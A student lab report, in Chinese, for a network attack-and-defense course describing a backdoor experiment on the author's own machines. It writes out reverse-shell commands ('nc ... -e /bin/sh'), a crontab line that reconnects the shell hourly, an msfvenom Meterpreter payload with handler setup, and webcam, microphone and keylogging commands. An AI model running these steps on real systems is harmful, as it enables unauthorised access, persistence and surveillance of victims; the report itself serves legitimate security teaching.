当前位置: 首页 > news >正文

20232302 2025-2026-1《网络与系统攻防技术》实验二实验报告

   

      1、实验内容

  1. 使用netcat获取主机操作Shell,cron启动某项任务。
  2. 使用socat获取主机操作Shell, 任务计划启动 。
  3. 使用MSF meterpreter生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell。
  4. 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权。
  5. 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
  6. 基础问题回答                                                                                                                                           (1)例举你能想到的一个后门进入到你系统中的可能方式?                                                                   攻击者入侵一个你常用的软件(如压缩工具、PDF阅读器)的官方更新服务器,将后门代码植入更新包。当你正常更新软件时,后门就随合法更新一起进入了你的系统。                                                           (2)例举你知道的后门如何启动起来(win及linux)的方式?                                                       ​Windows 系统:​​

​​注册表启动项​​:修改 Run、RunOnce等注册表键值,使系统启动时自动加载后门。
​​计划任务​​:创建一个在特定时间(如系统启动时、用户登录时)触发的计划任务来启动后门。
​​服务(Service)​​:将后门程序注册为系统服务,随系统核心进程一起启动。
​​Linux 系统:​​
​​系统服务​​:在 /etc/systemd/system/或 /etc/init.d/下创建自定义服务单元文件。
​​定时任务​​:利用 cron或 systemd定时器,设置系统重启后或定期执行后门程序。
​​Shell 配置文件​​:在用户级的启动文件如 ~/.bashrc或全局的 /etc/profile中插入启动命令。                          (3)Meterpreter有哪些给你映像深刻的功能?                                                                                             可以获取麦克风摄像头等功能,非常厉害。                                                                                              (4)如何发现自己有系统有没有被安装后门?                               

​​检查网络连接​​:使用 netstat等命令查看是否有未知程序在对外建立可疑连接。
​​检查启动项​​:审查系统和服务启动项(如 Windows 的计划任务、注册表,Linux 的 systemd、cron),查找可疑条目。
​​检查进程​​:查看运行中的进程列表,寻找名称可疑、资源占用异常的进程。
​​文件完整性检查​​:对比关键系统文件(如 ls, netstat等命令本身)的哈希值,看是否被后门版本替换。
​​监控系统性能​​:留意系统是否出现不明原因的卡顿、网络流量异常增高                                                       

2、实验过程 

2.1使用netcat获取主机操作Shellcron启动某项任务

首先记得关闭所有安全保护和防火墙,以便实验的顺利进行

 image

首先查看自己电脑和虚拟机的IP方便后续的作业

 

image

image

 接着使用netcat获取主机操作Shellcron启动任务

主机端输入ncat -lp 2302

image

虚拟机端输入nc 172.20.10.4 2302 -e /bin/sh

image

kali设置定时任务

通过crontab -e指令便捷定时任务,-e表示编辑文件最后一行添加33 **** nc 172.20.10.4 2302 -e /bin/sh

image

完成每小时的33分开启定时任务

image

如图定时任务生效

2.2使用socat获取主机操作Shell, 任务计划启动

首先在主机端安装socat

先在网站上下载好

image

接着在主机端打开2302端口

image

在主机端进入计算机管理界面选择任务计划程序设置自启动任务

image

image

等待预定时间,windows启动任务,socat运行获取shell

image

image

2.3使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncatsocat传送到主机并运行获取主机Shell

虚拟机输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.131  LPORT=2302 -f exe > 20232302.exe生成后门程序。

image

再主机端输入ncat-lv2302 >20232302.exe接收

image

虚拟机输入nc 192.168.31.199 2314 < 20232314.exe将生成的后门程序传到主机中接着依次输入

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.136.129
set LPORT 2314

最后输入exploit进行监听,同时主机运行后门程序

image

6229671ef30a8438b888200bbee54805

如图成功获取到了主机的shell

2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

在(3)的基础上,在meterpreter控制台中输入下列命令;

record_mic获取主机音频

webcam_snap获取主机摄像头内容

keyscan_start、keyscan_dump获取主机键盘输入内容

image

成功在虚拟机端得到主机端的摄像头内容

image

image

尝试进行提权

image

2.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

使用msf生成指定需要的shellcode并注入pwn1

image

image

接着利用chmod给新文件增加权限,最后回到终端获取shell

image

3、问题及解决方案

问题1:后门程序传输到主机之后无法打开

image

解决:通过询问老师和大模型更改程序为兼容模式后成功了

问题2:打开后门程序之后会出现进程died的情况

解决:重新关闭了所有安全系统防火墙,并更新

image

image

4、学习感悟

经过本次实验,我切身体会到后门程序对隐私安全的巨大威胁,攻击者能借此窃取摄像头画面、键盘输入等敏感信息,这凸显了日常排查与防御后门的极端重要性。实验中,Windows防火墙与设备安全保护机制展现出强大威力——一旦开启,多数攻击手段便难以生效,这提醒我们必须始终保持系统安全防护开启,并避免安装未经验证的程序。同时,我也认识到跨平台传输时编码格式的重要性,忽视转换将破坏数据完整性。通过使用Metasploit等集成化工具,我感受到专业渗透技术将复杂流程封装为简单命令的“高效性”,也意识到自身在底层命令和原理知识上的不足。未来,我将更注重夯实基础,不断提升实战能力与理论深度。

 

 

   

http://www.hskmm.com/?act=detail&tid=36529

相关文章:

  • 2025年10月医用面膜产品推荐:权威对比评测榜揭晓前五强
  • P11024 做题报告
  • 多模态数据湖技术深化,Data Agent新能力发布!“认知”将决定企业上限
  • 2025年10月投资纠纷律师推荐:五强榜单对比评测与选择指南
  • Web刷题篇-1 [BJDCTF2020]Easy MD5
  • 云斗 YDR Special# 004 S 模拟赛
  • Berry.Live:开箱即用的.NET直播流媒体服务器
  • 2025年10月上海ICL医生推荐榜:王晓瑛领衔五强对比
  • doris集成vertica 数据源catalog
  • JUnit 6.0.0发布:Java 17基线、取消API与Kotlin协程支持
  • 详细介绍:老题新解|合法C标识符
  • 2025年10月消泡剂厂家推荐:权威榜单一网打尽
  • 国产化Excel开发组件Spire.XLS教程:使用Python将TXT文件转换为CSV
  • VMware Holodeck 9.0.1.0 发布 - 自动化部署 VCF 实验环境
  • [题解]meal
  • CADSoftTools发布两款重要更新:CAD VCL Multiplatform 16.2 与 CAD .NET 16全新发布
  • linux常用命令 - 实践
  • 2025年10月河道防撞护栏厂家全景解析报告,基于专业测评的技术、性能及市场优势深度分析
  • 在 Linux 系统上安装 Miniconda、安装 Xinference,并设置 Xinference 开机自启动
  • 作业三(结对编程)-小学四则运算题目生成与判卷(Python + 可视化)
  • 无穷小比较、等价无穷小替换
  • 【项目复现上新】Karpathy大神开源GitHub高分项目NanoChat!仅用100美元+8000行代码手搓ChatGPT
  • CF2159E
  • 2025年10月景区钢丝绳护栏厂家全景解析报告,基于专业测评的技术、性能及市场优势深度分析
  • 技术 | 在单台电脑上管理多个 GitHub 账户并解决推送问题(测试中)
  • Stable Diffusion启动提示端口错误处理
  • 阿里云API网关日志问题
  • 2025年10月半封闭滑轨丝杆模组厂家全景解析报告,基于专业测评的技术、性能及市场优势深度分析
  • ipad协议对个人微信机器人进行二次开发
  • 西安交通大学国家级医学公关交叉平台实验室建设实拍图